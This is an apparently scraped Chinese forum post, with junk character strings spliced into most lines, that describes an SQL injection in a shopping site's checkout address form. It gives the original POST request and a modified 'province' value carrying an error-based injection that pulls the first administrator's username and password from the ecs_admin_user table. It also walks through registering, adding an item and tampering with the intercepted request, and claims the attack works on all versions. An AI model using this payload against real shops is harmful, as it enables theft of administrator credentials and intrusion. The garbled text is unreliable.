感谢欠杀的黑盒
# l, A4 Z* a7 ^) x$ K
5 F/ `* @8 p, Y I
; y* q/ h, \4 b! ]把任意商品加入购物车在填写配送地址那一页,有地区选择* ]9 |; Z. _9 O) B' W+ L
4 B- U1 A5 ?% q' i0 l5 \' c
flow.php?step=consignee&direct_shopping=1
8 o4 {9 I2 S4 O5 k; M ^比如省选择安徽
. ^3 m% J$ }: t$ p) g # b- f+ A! h) B
其中POST数据如下* \/ s) Z# W' G6 k; K9 F9 @+ p
; P2 B& G5 w3 T& z! M6 o; y
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3# D8 [- L5 a- ~# t
改成+ u8 h @1 S9 U1 g3 l
& x( W0 ]: T, B& ?' {+ tprovince=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #- ~5 V0 g* l3 T# T# W9 {
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..6 i9 C# }, x( [5 ^
* o2 C6 m: o( {8 H4 f先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
- M6 \; V* Z- @; H
, G( X* |& w L4 z. \- n就会回显错误页面了。。。。! Z$ D& ^0 }! L# b9 r- X5 D( O
% {; D- [; x6 X9 F( Z我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的/ \" q! X+ T: u& v# C; g
|